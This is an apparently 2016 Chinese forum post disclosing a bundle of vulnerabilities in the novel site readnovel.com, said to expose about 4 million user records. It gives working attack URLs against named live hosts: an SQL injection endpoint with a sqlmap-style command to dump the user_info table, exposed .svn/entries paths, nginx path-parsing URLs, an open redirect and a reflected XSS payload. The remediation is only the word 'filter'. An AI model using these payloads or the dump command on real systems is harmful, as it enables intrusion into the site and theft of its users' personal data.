HanDs
管理员

[7月漏洞公开] 小说阅读网漏洞打包/涉及400w用户数据 



rt

详细说明:

http://a.readnovel.com/usericon.php?a=load_icon_js&id=45619122,57738912,14444201,13089209,60299748,60299748,27913735,49165864,60308247,4010667,30284734,30284734,4010667,58931113,56685425,12843058,11121284,13429340,60010973,14846534

--dump -D newuc -T user_info

| user_info | 4590267 |



svn

<svn_entries> http://event.readnovel.com/RNfljh/.svn/entries

<svn_entries> http://event.readnovel.com/rnenter/.svn/entries



nginx 解析漏洞:

http://free.readnovel.com/robots.txt/a.php

http://www.readnovel.com/robots.txt/a.php



url跳转:

http://www.readnovel.com/friendlink.php?url=http%3A%2F%2Fwww.gov.cn%2F%3F1463749061.37



xss:

http://big.readnovel.com/search?ranker=ranker&keyword=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&finish_flag=finish_flag&publisherid=1finish_flag

漏洞证明:

T)}99I(PL8%YJ$BV[3E(}J0.png

修复方案:

过滤!


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
小说 翟亩镣
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复